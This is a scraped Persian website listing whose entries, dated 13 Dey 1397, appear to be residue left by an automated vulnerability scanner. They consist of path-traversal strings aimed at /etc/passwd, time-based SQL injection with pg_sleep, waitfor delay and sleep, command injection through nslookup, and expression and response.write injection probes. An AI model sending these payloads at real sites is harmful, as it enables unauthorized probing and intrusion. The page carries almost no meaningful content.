./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 13 دی 1397

1


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

${9999813+10000172}


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 13 دی 1397

1


1 13 دی 1397

1


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


${10000226+10000100} 13 دی 1397

1


1 13 دی 1397

1


/.././.././.././.././.././.././.././../etc/./passwd%00 13 دی 1397

1


%2fetc%2fpasswd 13 دی 1397

1


1 13 دی 1397

1


/etc/passwd 13 دی 1397

1


VaSgxR2R'));select pg_sleep(15); -- 13 دی 1397

1


7sPEALh5');select pg_sleep(7); -- 13 دی 1397

1


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 13 دی 1397

1


/../..//../..//../..//../..//../..//etc/passwd.jpg 13 دی 1397

1


vsPHPKbF';select pg_sleep(7); -- 13 دی 1397

1


-1));select pg_sleep(22); -- 13 دی 1397

1


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 13 دی 1397

1


../../../../../../../../../../etc/passwd.jpg 13 دی 1397

1


-1);select pg_sleep(22); -- 13 دی 1397

1


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 13 دی 1397

1


-1;select pg_sleep(22); -- 13 دی 1397

1


sFPWG4cl'; waitfor delay '0:0:15' -- 13 دی 1397

1


../../../../../../../../../../../../../../../proc/version 13 دی 1397

1


1 13 دی 1397

&nslookup gPS112Xm&'\"`0&nslookup gPS112Xm&`'


1 waitfor delay '0:0:15' -- 13 دی 1397

1


../../../../../../../../../../etc/passwd 13 دی 1397

1


1 13 دی 1397

$(nslookup bIvxkJXz)


-1); waitfor delay '0:0:15' -- 13 دی 1397

1


-1; waitfor delay '0:0:7' -- 13 دی 1397

1


(select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/ 13 دی 1397

1


if(now()=sysdate(),sleep(7),0)/*'XOR(if(now()=sysdate(),sleep(7),0))OR'"XOR(if(now()=sysdate(),sleep(7),0))OR"*/ 13 دی 1397

1


1 13 دی 1397

set|set&set


-1" OR 2+803-803-1=0+0+0+1 -- 13 دی 1397

1


1 13 دی 1397

ISdLtaiC


-1' OR 2+301-301-1=0+0+0+1 or 'F2lMVg8t'=' 13 دی 1397

1


1 13 دی 1397

1


-1' OR 2+983-983-1=0+0+0+1 -- 13 دی 1397

1


skVxIkpk 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

"+response.write(9708893*9090419)+"


1 13 دی 1397

1


1 13 دی 1397

'+response.write(9708893*9090419)+'


1 13 دی 1397

1


-1 OR 2+923-923-1=0+0+0+1 13 دی 1397

1


&nslookup SIWC90Ui&'\"`0&nslookup SIWC90Ui&`' 13 دی 1397

1


-1 OR 2+790-790-1=0+0+0+1 -- 13 دی 1397

1


AQGX4mwO 13 دی 1397

1


1 13 دی 1397

response.write(9708893*9090419)


$(nslookup pEfk2jc6) 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


set|set&set 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


"+response.write(9448166*9935886)+" 13 دی 1397

1


'+response.write(9448166*9935886)+' 13 دی 1397

1


response.write(9448166*9935886) 13 دی 1397

1


1 13 دی 1397

1


مقالات ویژه
آرشیو


مقالات پربازدید
آرشیو


آخرین مقالات
آرشیو


بازدید امروز: 1254

بازدید هفته: 6294

بازدید ماه: 34369

کلیه حقوق سایت متعلق به مدیر سایت میباشد.